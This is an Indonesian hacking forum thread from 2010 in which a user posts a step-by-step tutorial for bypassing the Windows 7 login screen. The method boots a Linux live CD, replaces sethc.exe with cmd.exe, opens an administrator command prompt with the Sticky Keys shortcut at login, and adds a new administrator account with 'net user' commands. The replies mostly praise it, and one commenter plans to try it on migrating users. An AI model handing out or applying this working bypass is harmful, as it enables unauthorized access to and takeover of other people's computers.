Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

Local hacking windows 7

[ Facebook comments]

Forum untuk membahas hacking secara umum

Moderators: Paman, Xshadow, indounderground

Local hacking windows 7

Postby t0bi » Fri Mar 19, 2010 8:09 pm

Mohon maap tutorial cupu bin ndeso =
cuma pengen share dikit aja mengenai windows 7
langsung aja lah gak udah banyak ngemeng :
cekidot gan..

1. masukin Live CD linux ke komputer yang ada sistem operasi windows 7
2. mount drive C:/ nya => mount /dev/hda1 /media/driveC
3. masuk ke system32 = > cd /media/driveC/Windows/System32
4. backup sethc.exe nya biar ntar bisa dibalikin seperti semula => cp sethc.exe sethc.backup
5. kita copy cmd.exe menjadi file sethc.exe => cp cmd.exe sethc.exe mulai tau kan intinya ntar kalau kita panggil sethc.exe maka yg muncul adalah cmd.exe
6. proses di linux sudah selesai, langsung aja reboot & booting ke windows 7
7. pada saat muncul login windows 7 tekan tombol shift 5x untuk nampilin sethc.exe yang tadi :ngakak: taraaa muncul dah tuh cmd dengan akses administrator :gebrak:
8. tambah user baru => net user <username> <password> /add
9. set user sebagai administrator => net localgroup administrators /add <username>
10. restart windows 7. dan login ke user yang barusan dibuat..

maap tutorial cupu tapi semoga bermanfaat..
referensi = dari berbagai sumber (lupa dapet dari mana, maap)
~>uchiha t0bi is always newbie<~
~akatsuki~
User avatar
t0bi
 
Posts: 26
Joined: Fri Dec 25, 2009 7:59 am

Re: Local hacking windows 7

Postby nesta » Fri Mar 19, 2010 8:52 pm

nice share... kalo bukan win7 bisa juga ya om??? :devil
imajinasi jauh lebih penting dari pada pengetahuan
User avatar
nesta
 
Posts: 555
Joined: Fri May 08, 2009 12:17 am

Re: Local hacking windows 7

Postby poni » Fri Mar 19, 2010 9:21 pm

Cool.. nice share
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
User avatar
poni
 
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia

Re: Local hacking windows 7

Postby tey » Sat Mar 20, 2010 4:12 am

mantap jaya neh :love:
i am not detractor person..like u :)
be a good boy..
User avatar
tey
 
Posts: 68
Joined: Tue May 01, 2007 11:30 am
Location: heaven

Re: Local hacking windows 7

Postby t0bi » Wed Mar 24, 2010 6:43 pm

nesta wrote:nice share... kalo bukan win7 bisa juga ya om??? :devil

bisa om. ini bug lama windows yang ternyata blm di patch di windows 7 :ngakak:
~>uchiha t0bi is always newbie<~
~akatsuki~
User avatar
t0bi
 
Posts: 26
Joined: Fri Dec 25, 2009 7:59 am

Re: Local hacking windows 7

Postby t0bi » Wed Mar 24, 2010 6:46 pm

poni wrote:Cool.. nice share

thanks mas.. :love:
~>uchiha t0bi is always newbie<~
~akatsuki~
User avatar
t0bi
 
Posts: 26
Joined: Fri Dec 25, 2009 7:59 am

Re: Local hacking windows 7

Postby m42h31 » Wed Mar 24, 2010 7:21 pm

nice share..
http://m42h31.wordpress.com
User avatar
m42h31
 
Posts: 15
Joined: Sat May 03, 2008 9:42 pm
Location: on keyboad

Re: Local hacking windows 7

Postby t0bi » Sat Mar 27, 2010 8:28 pm

m42h31 wrote:nice share..

maap mas, materi workshopnya sayah posting disini..
:malumalu: :maaf: :maaf:
~>uchiha t0bi is always newbie<~
~akatsuki~
User avatar
t0bi
 
Posts: 26
Joined: Fri Dec 25, 2009 7:59 am

Re: Local hacking windows 7

Postby peniru » Sat Mar 27, 2010 9:34 pm

wah mantaf kk.,. baru tau nih... :love: :love:
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
User avatar
peniru
 
Posts: 383
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar

Re: Local hacking windows 7

Postby phychole » Sun Mar 28, 2010 7:03 am

wah mumpung banyak yg migrasi k win7 coba dulu ah
[center]Saya belajar selama saya hidup
batu nisan akan menjadi ijazah saya
http://www.phychole.web.id
http://www.phychole.co.cc
[/center]
User avatar
phychole
 
Posts: 387
Joined: Tue Jun 09, 2009 8:59 pm
Location: Petahunan Sumbersuko Lumajang

leave a comment

Next

Return to Hacking Umum

Who is online

Users browsing this forum: No registered users and 10 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id